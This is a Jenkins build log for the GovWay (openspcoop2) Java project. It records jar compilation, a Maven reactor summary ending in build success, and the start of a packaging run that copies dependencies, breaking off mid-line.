/var/lib/jenkins/workspace/GovWay/build/govwayConfig/compile-jar-openspcoop2 18:06:10 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:06:10 [WARNING] [echo] **************************************** 18:06:10 [WARNING] [echo] **** DEBUG MODE ON ***** 18:06:10 [WARNING] [echo] **************************************** 18:06:10 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:06:10 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/rs/config/server/src/] 18:06:10 [INFO] [javac] Compiling 468 source files to /var/lib/jenkins/workspace/GovWay/build/govwayConfig/compile-jar-openspcoop2 18:06:21 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_rs-config-server_RELEASE.jar 18:06:22 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/govwayConfig/compile-jar-openspcoop2 18:06:33 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:06:33 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:06:33 [WARNING] [echo] **************************************** 18:06:33 [WARNING] [echo] **** DEBUG MODE ON ***** 18:06:33 [WARNING] [echo] **************************************** 18:06:33 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:06:33 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/rs/monitor/server/src/] 18:06:33 [INFO] [javac] Compiling 126 source files to /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:06:35 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_rs-monitor-server_RELEASE.jar 18:06:35 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/govwayMonitor/compile-jar-openspcoop2 18:06:45 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/timerStatistiche 18:06:45 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/timerStatistiche/tmp 18:06:45 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/timerStatisticheWar 18:06:51 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/timerStatistiche/compile-jar-openspcoop2 18:06:51 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:06:51 [WARNING] [echo] **************************************** 18:06:51 [WARNING] [echo] **** DEBUG MODE ON ***** 18:06:51 [WARNING] [echo] **************************************** 18:06:51 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:06:52 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/timer/statistiche/src/] 18:06:52 [INFO] [javac] Compiling 7 source files to /var/lib/jenkins/workspace/GovWay/build/timerStatistiche/compile-jar-openspcoop2 18:06:52 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_timer-statistiche_RELEASE.jar 18:06:52 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/timerStatistiche/compile-jar-openspcoop2 18:07:02 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:02 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:02 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:07:02 [WARNING] [echo] **************************************** 18:07:02 [WARNING] [echo] **** DEBUG MODE ON ***** 18:07:02 [WARNING] [echo] **************************************** 18:07:02 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:07:02 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/batch/statistiche/src/] 18:07:02 [INFO] [javac] Compiling 2 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:03 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_batch-statistiche_RELEASE.jar 18:07:03 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:12 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:12 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:07:12 [WARNING] [echo] **************************************** 18:07:12 [WARNING] [echo] **** DEBUG MODE ON ***** 18:07:12 [WARNING] [echo] **************************************** 18:07:12 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:07:12 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/batch/runtime-repository/src/] 18:07:12 [INFO] [javac] Compiling 7 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:13 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_batch-runtime-repository_RELEASE.jar 18:07:13 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:22 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:22 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:07:22 [WARNING] [echo] **************************************** 18:07:22 [WARNING] [echo] **** DEBUG MODE ON ***** 18:07:22 [WARNING] [echo] **************************************** 18:07:22 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:07:22 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/command_line_interfaces/config_loader/src] 18:07:22 [INFO] [javac] Compiling 5 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:23 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_cli-configLoader_RELEASE.jar 18:07:23 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:32 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:32 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:07:32 [WARNING] [echo] **************************************** 18:07:32 [WARNING] [echo] **** DEBUG MODE ON ***** 18:07:32 [WARNING] [echo] **************************************** 18:07:32 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:07:32 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/command_line_interfaces/govway_vault/src] 18:07:32 [INFO] [javac] Compiling 8 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:33 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_cli-vault_RELEASE.jar 18:07:33 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:43 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:43 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:07:43 [WARNING] [echo] **************************************** 18:07:43 [WARNING] [echo] **** DEBUG MODE ON ***** 18:07:43 [WARNING] [echo] **************************************** 18:07:43 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:07:43 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/command_line_interfaces/template_scan/src] 18:07:43 [INFO] [javac] Compiling 4 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:44 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_cli-templateScan_RELEASE.jar 18:07:44 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:07:44 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build 18:07:44 [INFO] [move] Moving 35 files to /var/lib/jenkins/workspace/GovWay/dist.backup 18:07:44 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist 18:07:44 [INFO] [move] Moving 35 files to /var/lib/jenkins/workspace/GovWay/dist 18:07:44 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/dist.backup 18:07:44 [INFO] Executed tasks 18:07:44 [INFO] 18:07:44 [INFO] --------------< org.openspcoop2:org.openspcoop2.package >--------------- 18:07:44 [INFO] Building package 1.0 [59/67] 18:07:44 [INFO] from distrib/pom.xml 18:07:44 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:44 [INFO] 18:07:44 [INFO] ----------< org.openspcoop2:org.openspcoop2.testsuite.utils >----------- 18:07:44 [INFO] Building testsuite.utils 1.0 [60/67] 18:07:44 [INFO] from tools/utils/mvn/pom.xml 18:07:44 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:44 [INFO] 18:07:44 [INFO] --------< org.openspcoop2:org.openspcoop2.testsuite.utils.sql >--------- 18:07:44 [INFO] Building testsuite.utils.sql 1.0 [61/67] 18:07:44 [INFO] from tools/utils/mvn/sql/pom.xml 18:07:44 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:44 [INFO] 18:07:44 [INFO] ---------< org.openspcoop2:org.openspcoop2.testsuite.pdd.core >--------- 18:07:44 [INFO] Building testsuite.pdd.core 1.0 [62/67] 18:07:44 [INFO] from core/mvn/pom.xml 18:07:44 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:44 [INFO] 18:07:44 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.pdd.core.sql >------- 18:07:44 [INFO] Building testsuite.pdd.core.sql 1.0 [63/67] 18:07:44 [INFO] from core/mvn/sql/pom.xml 18:07:44 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:44 [INFO] 18:07:44 [INFO] ------< org.openspcoop2:org.openspcoop2.static_analysis.spotbugs >------ 18:07:44 [INFO] Building static_analysis.spotbugs 1.0 [64/67] 18:07:44 [INFO] from tools/spotbugs/mvn/pom.xml 18:07:44 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:44 [INFO] 18:07:44 [INFO] -----< org.openspcoop2:org.openspcoop2.static_analysis.sonarqube >------ 18:07:44 [INFO] Building static_analysis.sonarqube 1.0 [65/67] 18:07:44 [INFO] from tools/sonarqube/mvn/pom.xml 18:07:44 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:44 [INFO] 18:07:44 [INFO] --------< org.openspcoop2:org.openspcoop2.dynamic_analysis.zap >-------- 18:07:44 [INFO] Building dynamic_analysis.zap 1.0 [66/67] 18:07:44 [INFO] from tools/zap/mvn/pom.xml 18:07:44 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:44 [INFO] 18:07:44 [INFO] ----------< org.openspcoop2:org.openspcoop2.coverage.jacoco >----------- 18:07:44 [INFO] Building coverage.jacoco 1.0 [67/67] 18:07:44 [INFO] from tools/jacoco/mvn/pom.xml 18:07:44 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:44 [INFO] ------------------------------------------------------------------------ 18:07:44 [INFO] Reactor Summary for govway 1.0: 18:07:44 [INFO] 18:07:44 [INFO] govway ............................................. SUCCESS [ 0.004 s] 18:07:44 [INFO] dependencies ....................................... SUCCESS [ 0.001 s] 18:07:44 [INFO] dependencies.ant ................................... SUCCESS [ 4.046 s] 18:07:44 [INFO] dependencies.antinstaller .......................... SUCCESS [ 0.117 s] 18:07:44 [INFO] dependencies.angus ................................. SUCCESS [ 0.140 s] 18:07:44 [INFO] dependencies.bean-validation ....................... SUCCESS [ 0.151 s] 18:07:44 [INFO] dependencies.cxf ................................... SUCCESS [ 2.038 s] 18:07:44 [INFO] dependencies.commons ............................... SUCCESS [ 0.951 s] 18:07:44 [INFO] dependencies.console ............................... SUCCESS [ 0.082 s] 18:07:44 [INFO] dependencies.git ................................... SUCCESS [ 0.051 s] 18:07:44 [INFO] dependencies.httpcore .............................. SUCCESS [ 0.164 s] 18:07:44 [INFO] dependencies.jackson ............................... SUCCESS [ 0.248 s] 18:07:44 [INFO] dependencies.jakarta ............................... SUCCESS [ 0.255 s] 18:07:44 [INFO] dependencies.jaxb .................................. SUCCESS [ 0.198 s] 18:07:44 [INFO] dependencies.jetty ................................. SUCCESS [ 0.188 s] 18:07:44 [INFO] dependencies.jmx ................................... SUCCESS [ 0.347 s] 18:07:44 [INFO] dependencies.json .................................. SUCCESS [ 0.809 s] 18:07:44 [INFO] dependencies.log ................................... SUCCESS [ 0.242 s] 18:07:44 [INFO] dependencies.lucene ................................ SUCCESS [ 0.045 s] 18:07:44 [INFO] dependencies.openapi4j ............................. SUCCESS [ 0.242 s] 18:07:44 [INFO] dependencies.opensaml .............................. SUCCESS [ 0.248 s] 18:07:44 [INFO] dependencies.pdf ................................... SUCCESS [ 0.092 s] 18:07:44 [INFO] dependencies.redis ................................. SUCCESS [ 0.242 s] 18:07:44 [INFO] dependencies.reports ............................... SUCCESS [ 0.113 s] 18:07:44 [INFO] dependencies.saaj .................................. SUCCESS [ 0.253 s] 18:07:44 [INFO] dependencies.security .............................. SUCCESS [ 0.168 s] 18:07:44 [INFO] dependencies.shared ................................ SUCCESS [ 0.628 s] 18:07:44 [INFO] dependencies.spring ................................ SUCCESS [ 0.106 s] 18:07:44 [INFO] dependencies.spring-ldap ........................... SUCCESS [ 0.040 s] 18:07:44 [INFO] dependencies.spring-security ....................... SUCCESS [ 0.055 s] 18:07:44 [INFO] dependencies.swagger ............................... SUCCESS [ 0.388 s] 18:07:44 [INFO] dependencies.wss4j ................................. SUCCESS [ 0.333 s] 18:07:44 [INFO] dependencies.testsuite ............................. SUCCESS [ 0.001 s] 18:07:44 [INFO] dependencies.testsuite.axis14 ...................... SUCCESS [ 0.281 s] 18:07:44 [INFO] dependencies.testsuite.as .......................... SUCCESS [ 0.001 s] 18:07:44 [INFO] dependencies.testsuite.as.wildfly27 ................ SUCCESS [ 0.178 s] 18:07:44 [INFO] dependencies.testsuite.as.wildfly28 ................ SUCCESS [ 0.181 s] 18:07:44 [INFO] dependencies.testsuite.as.wildfly35 ................ SUCCESS [ 0.238 s] 18:07:44 [INFO] dependencies.testsuite.as.wildfly36 ................ SUCCESS [ 0.233 s] 18:07:44 [INFO] dependencies.testsuite.as.wildfly37 ................ SUCCESS [ 0.205 s] 18:07:44 [INFO] dependencies.testsuite.as.wildfly38 ................ SUCCESS [ 0.083 s] 18:07:44 [INFO] dependencies.testsuite.as.wildfly39 ................ SUCCESS [ 0.204 s] 18:07:44 [INFO] dependencies.testsuite.as.tomcat10 ................. SUCCESS [ 0.027 s] 18:07:44 [INFO] dependencies.testsuite.as.tomcat11 ................. SUCCESS [ 0.037 s] 18:07:44 [INFO] dependencies.testsuite.test ........................ SUCCESS [ 0.009 s] 18:07:44 [INFO] dependencies.testsuite.test.testng ................. SUCCESS [ 0.070 s] 18:07:44 [INFO] dependencies.testsuite.test.junit4 ................. SUCCESS [ 0.055 s] 18:07:44 [INFO] dependencies.testsuite.test.karate09 ............... SUCCESS [ 0.067 s] 18:07:44 [INFO] dependencies.testsuite.test.logback ................ SUCCESS [ 0.030 s] 18:07:44 [INFO] dependencies.testsuite.test.httpcore4 .............. SUCCESS [ 0.055 s] 18:07:44 [INFO] dependencies.testsuite.test.spring5 ................ SUCCESS [ 0.052 s] 18:07:44 [INFO] dependencies.testsuite.test.spring-ldap2 ........... SUCCESS [ 0.043 s] 18:07:44 [INFO] dependencies.testsuite.test.apacheds ............... SUCCESS [ 0.207 s] 18:07:44 [INFO] dependencies.testsuite.test.cxf3 ................... SUCCESS [ 0.063 s] 18:07:44 [INFO] dependencies.testsuite.staticAnalysis .............. SUCCESS [ 0.036 s] 18:07:44 [INFO] dependencies.testsuite.dynamicAnalysis ............. SUCCESS [ 0.071 s] 18:07:44 [INFO] dependencies.testsuite.coverage .................... SUCCESS [ 0.054 s] 18:07:44 [INFO] compile ............................................ SUCCESS [20:27 min] 18:07:44 [INFO] package ............................................ SUCCESS [ 0.004 s] 18:07:44 [INFO] testsuite.utils .................................... SUCCESS [ 0.001 s] 18:07:44 [INFO] testsuite.utils.sql ................................ SUCCESS [ 0.001 s] 18:07:44 [INFO] testsuite.pdd.core ................................. SUCCESS [ 0.001 s] 18:07:44 [INFO] testsuite.pdd.core.sql ............................. SUCCESS [ 0.001 s] 18:07:44 [INFO] static_analysis.spotbugs ........................... SUCCESS [ 0.001 s] 18:07:44 [INFO] static_analysis.sonarqube .......................... SUCCESS [ 0.001 s] 18:07:44 [INFO] dynamic_analysis.zap ............................... SUCCESS [ 0.001 s] 18:07:44 [INFO] coverage.jacoco .................................... SUCCESS [ 0.001 s] 18:07:44 [INFO] ------------------------------------------------------------------------ 18:07:44 [INFO] BUILD SUCCESS 18:07:44 [INFO] ------------------------------------------------------------------------ 18:07:44 [INFO] Total time: 20:44 min 18:07:44 [INFO] Finished at: 2026-04-07T18:07:44+02:00 18:07:44 [INFO] ------------------------------------------------------------------------ 18:07:44 [GovWay] $ /opt/apache-maven-3.9.10/bin/mvn -Dpackage.git_info.generate=false -Dpackage=package -Dcompile=none -Dowasp=none -Dtestsuite=none package 18:07:46 [INFO] Scanning for projects... 18:07:47 [INFO] ------------------------------------------------------------------------ 18:07:47 [INFO] Reactor Build Order: 18:07:47 [INFO] 18:07:47 [INFO] govway [pom] 18:07:47 [INFO] dependencies [pom] 18:07:47 [INFO] dependencies.ant [pom] 18:07:47 [INFO] dependencies.antinstaller [pom] 18:07:47 [INFO] dependencies.angus [pom] 18:07:47 [INFO] dependencies.bean-validation [pom] 18:07:47 [INFO] dependencies.cxf [pom] 18:07:47 [INFO] dependencies.commons [pom] 18:07:47 [INFO] dependencies.console [pom] 18:07:47 [INFO] dependencies.git [pom] 18:07:47 [INFO] dependencies.httpcore [pom] 18:07:47 [INFO] dependencies.jackson [pom] 18:07:47 [INFO] dependencies.jakarta [pom] 18:07:47 [INFO] dependencies.jaxb [pom] 18:07:47 [INFO] dependencies.jetty [pom] 18:07:47 [INFO] dependencies.jmx [pom] 18:07:47 [INFO] dependencies.json [pom] 18:07:47 [INFO] dependencies.log [pom] 18:07:47 [INFO] dependencies.lucene [pom] 18:07:47 [INFO] dependencies.openapi4j [pom] 18:07:47 [INFO] dependencies.opensaml [pom] 18:07:47 [INFO] dependencies.pdf [pom] 18:07:47 [INFO] dependencies.redis [pom] 18:07:47 [INFO] dependencies.reports [pom] 18:07:47 [INFO] dependencies.saaj [pom] 18:07:47 [INFO] dependencies.security [pom] 18:07:47 [INFO] dependencies.shared [pom] 18:07:47 [INFO] dependencies.spring [pom] 18:07:47 [INFO] dependencies.spring-ldap [pom] 18:07:47 [INFO] dependencies.spring-security [pom] 18:07:47 [INFO] dependencies.swagger [pom] 18:07:47 [INFO] dependencies.wss4j [pom] 18:07:47 [INFO] dependencies.testsuite [pom] 18:07:47 [INFO] dependencies.testsuite.axis14 [pom] 18:07:47 [INFO] dependencies.testsuite.as [pom] 18:07:47 [INFO] dependencies.testsuite.as.wildfly27 [pom] 18:07:47 [INFO] dependencies.testsuite.as.wildfly28 [pom] 18:07:47 [INFO] dependencies.testsuite.as.wildfly35 [pom] 18:07:47 [INFO] dependencies.testsuite.as.wildfly36 [pom] 18:07:47 [INFO] dependencies.testsuite.as.wildfly37 [pom] 18:07:47 [INFO] dependencies.testsuite.as.wildfly38 [pom] 18:07:47 [INFO] dependencies.testsuite.as.wildfly39 [pom] 18:07:47 [INFO] dependencies.testsuite.as.tomcat10 [pom] 18:07:47 [INFO] dependencies.testsuite.as.tomcat11 [pom] 18:07:47 [INFO] dependencies.testsuite.test [pom] 18:07:47 [INFO] dependencies.testsuite.test.testng [pom] 18:07:47 [INFO] dependencies.testsuite.test.junit4 [pom] 18:07:47 [INFO] dependencies.testsuite.test.karate09 [pom] 18:07:47 [INFO] dependencies.testsuite.test.logback [pom] 18:07:47 [INFO] dependencies.testsuite.test.httpcore4 [pom] 18:07:47 [INFO] dependencies.testsuite.test.spring5 [pom] 18:07:47 [INFO] dependencies.testsuite.test.spring-ldap2 [pom] 18:07:47 [INFO] dependencies.testsuite.test.apacheds [pom] 18:07:47 [INFO] dependencies.testsuite.test.cxf3 [pom] 18:07:47 [INFO] dependencies.testsuite.staticAnalysis [pom] 18:07:47 [INFO] dependencies.testsuite.dynamicAnalysis [pom] 18:07:47 [INFO] dependencies.testsuite.coverage [pom] 18:07:47 [INFO] compile [pom] 18:07:47 [INFO] package [pom] 18:07:47 [INFO] testsuite.utils [pom] 18:07:47 [INFO] testsuite.utils.sql [pom] 18:07:47 [INFO] testsuite.pdd.core [pom] 18:07:47 [INFO] testsuite.pdd.core.sql [pom] 18:07:47 [INFO] static_analysis.spotbugs [pom] 18:07:47 [INFO] static_analysis.sonarqube [pom] 18:07:47 [INFO] dynamic_analysis.zap [pom] 18:07:47 [INFO] coverage.jacoco [pom] 18:07:47 [INFO] 18:07:47 [INFO] ------------------< org.openspcoop2:org.openspcoop2 >------------------- 18:07:47 [INFO] Building govway 1.0 [1/67] 18:07:47 [INFO] from pom.xml 18:07:47 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:47 [INFO] 18:07:47 [INFO] ------------< org.openspcoop2:org.openspcoop2.dependencies >------------ 18:07:47 [INFO] Building dependencies 1.0 [2/67] 18:07:47 [INFO] from mvn/dependencies/pom.xml 18:07:47 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:47 [INFO] 18:07:47 [INFO] ----------------< org.openspcoop2:org.openspcoop2.ant >----------------- 18:07:47 [INFO] Building dependencies.ant 1.0 [3/67] 18:07:47 [INFO] from mvn/dependencies/ant/pom.xml 18:07:47 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:47 [INFO] 18:07:47 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.ant --- 18:07:47 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/ant (includes = [*.jar], excludes = []) 18:07:47 [INFO] 18:07:47 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.ant --- 18:07:49 [INFO] 18:07:49 [INFO] ------------< org.openspcoop2:org.openspcoop2.antinstaller >------------ 18:07:49 [INFO] Building dependencies.antinstaller 1.0 [4/67] 18:07:49 [INFO] from mvn/dependencies/antinstaller/pom.xml 18:07:49 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:49 [INFO] 18:07:49 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.antinstaller --- 18:07:49 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/antinstaller (includes = [*.jar], excludes = []) 18:07:49 [INFO] 18:07:49 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.antinstaller --- 18:07:49 [INFO] 18:07:49 [INFO] ---------------< org.openspcoop2:org.openspcoop2.angus >---------------- 18:07:49 [INFO] Building dependencies.angus 1.0 [5/67] 18:07:49 [INFO] from mvn/dependencies/angus/pom.xml 18:07:49 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:49 [INFO] 18:07:49 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.angus --- 18:07:49 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/angus (includes = [*.jar], excludes = []) 18:07:49 [INFO] 18:07:49 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.angus --- 18:07:49 [INFO] 18:07:49 [INFO] ----------< org.openspcoop2:org.openspcoop2.bean-validation >----------- 18:07:49 [INFO] Building dependencies.bean-validation 1.0 [6/67] 18:07:49 [INFO] from mvn/dependencies/bean-validation/pom.xml 18:07:49 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:49 [INFO] 18:07:49 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.bean-validation --- 18:07:49 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/bean-validation (includes = [*.jar], excludes = []) 18:07:49 [INFO] 18:07:49 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.bean-validation --- 18:07:49 [INFO] 18:07:49 [INFO] ----------------< org.openspcoop2:org.openspcoop2.cxf >----------------- 18:07:49 [INFO] Building dependencies.cxf 1.0 [7/67] 18:07:49 [INFO] from mvn/dependencies/cxf/pom.xml 18:07:49 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:49 [INFO] 18:07:49 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.cxf --- 18:07:49 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/cxf (includes = [*.jar], excludes = []) 18:07:49 [INFO] 18:07:49 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.cxf --- 18:07:49 [INFO] 18:07:49 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.cxf --- 18:07:50 [INFO] Executing tasks 18:07:50 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/cxf/cxf-core-4.1.3.jar 18:07:50 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/cxf/cxf-rt-rs-security-jose-4.1.3.jar 18:07:50 [INFO] Executed tasks 18:07:50 [INFO] 18:07:50 [INFO] --------------< org.openspcoop2:org.openspcoop2.commons >--------------- 18:07:50 [INFO] Building dependencies.commons 1.0 [8/67] 18:07:50 [INFO] from mvn/dependencies/commons/pom.xml 18:07:50 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:50 [INFO] 18:07:50 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.commons --- 18:07:50 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/commons (includes = [*.jar], excludes = []) 18:07:50 [INFO] 18:07:50 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.commons --- 18:07:50 [INFO] 18:07:50 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.commons --- 18:07:50 [INFO] Executing tasks 18:07:50 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/commons/commons-jcs3-core-3.2.1.jar 18:07:50 [INFO] Executed tasks 18:07:50 [INFO] 18:07:50 [INFO] --------------< org.openspcoop2:org.openspcoop2.console >--------------- 18:07:50 [INFO] Building dependencies.console 1.0 [9/67] 18:07:50 [INFO] from mvn/dependencies/console/pom.xml 18:07:50 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:50 [INFO] 18:07:50 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.console --- 18:07:50 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/console (includes = [*.jar], excludes = []) 18:07:50 [INFO] 18:07:50 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.console --- 18:07:50 [INFO] 18:07:50 [INFO] ----------------< org.openspcoop2:org.openspcoop2.git >----------------- 18:07:50 [INFO] Building dependencies.git 1.0 [10/67] 18:07:50 [INFO] from mvn/dependencies/git/pom.xml 18:07:50 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:50 [INFO] 18:07:50 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.git --- 18:07:50 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/git (includes = [*.jar], excludes = []) 18:07:50 [INFO] 18:07:50 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.git --- 18:07:50 [INFO] 18:07:50 [INFO] --------------< org.openspcoop2:org.openspcoop2.httpcore >-------------- 18:07:50 [INFO] Building dependencies.httpcore 1.0 [11/67] 18:07:50 [INFO] from mvn/dependencies/httpcore/pom.xml 18:07:50 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:50 [INFO] 18:07:50 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.httpcore --- 18:07:50 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/httpcore (includes = [*.jar], excludes = []) 18:07:50 [INFO] 18:07:50 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.httpcore --- 18:07:50 [INFO] 18:07:50 [INFO] --------------< org.openspcoop2:org.openspcoop2.jackson >--------------- 18:07:50 [INFO] Building dependencies.jackson 1.0 [12/67] 18:07:50 [INFO] from mvn/dependencies/jackson/pom.xml 18:07:50 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:50 [INFO] 18:07:50 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jackson --- 18:07:50 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jackson (includes = [*.jar], excludes = []) 18:07:50 [INFO] 18:07:50 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jackson --- 18:07:50 [INFO] 18:07:50 [INFO] --------------< org.openspcoop2:org.openspcoop2.jakarta >--------------- 18:07:50 [INFO] Building dependencies.jakarta 1.0 [13/67] 18:07:50 [INFO] from mvn/dependencies/jakarta/pom.xml 18:07:50 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:50 [INFO] 18:07:50 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jakarta --- 18:07:50 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/jakarta (includes = [*.jar], excludes = []) 18:07:50 [INFO] 18:07:50 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.jakarta --- 18:07:51 [INFO] 18:07:51 [INFO] ----------------< org.openspcoop2:org.openspcoop2.jaxb >---------------- 18:07:51 [INFO] Building dependencies.jaxb 1.0 [14/67] 18:07:51 [INFO] from mvn/dependencies/jaxb/pom.xml 18:07:51 [INFO] --------------------------------[ pom ]--------------------------------- 18:07:51 [INFO] 18:07:51 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.jaxb --- 18:07:51 [INFO] Deleting 